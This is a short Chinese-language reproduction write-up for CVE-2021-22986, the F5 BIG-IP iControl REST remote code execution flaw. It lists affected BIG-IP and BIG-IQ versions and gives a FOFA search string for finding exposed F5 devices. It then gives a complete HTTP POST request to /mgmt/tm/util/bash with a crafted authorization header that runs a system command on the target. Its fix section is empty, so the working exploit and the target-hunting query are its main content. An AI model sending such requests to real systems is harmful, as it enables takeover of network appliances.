CVE-2021-22986F5BIG-IP远程代码执⾏漏洞复现
F5 BIG-IP
F5 BIG-IP 链路控制器⽤于最⼤限度提升链路性能与可⽤性的下⼀代⼴域⽹链路流量管理。
漏洞简介
F5 BIG-IP 存在代码执⾏漏洞,该漏洞允许定义⾝份验证的攻击者通过 BIG-IP 管理界⾯和⾃⾝IP地址对 iControl REST 接⼝进⾏⽹络访问,以执⾏任意系统命令,控制⽬标机器。
影响版本
F5 BIG-IP 16.0.0-16.0.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 6.0.0-6.1.0
漏洞复现
fofa搜索关键词:
body="F5 Networks, Inc"
cve漏洞库
打开⾸页如下:
构造请求数据包,执⾏任意命令:
POST /mgmt/tm/util/bash HTTP/1.1 Host: 192.168.1.123:8443 Connection: close
Content-Length: 39
Cache-Control: max-age=0 Authorization: Basic YWRtaW46QVNhc1M= X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json {"command":"run","utilCmdArgs":"-c id"}
POC
已有多位师傅放出了POC:
修复建议

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。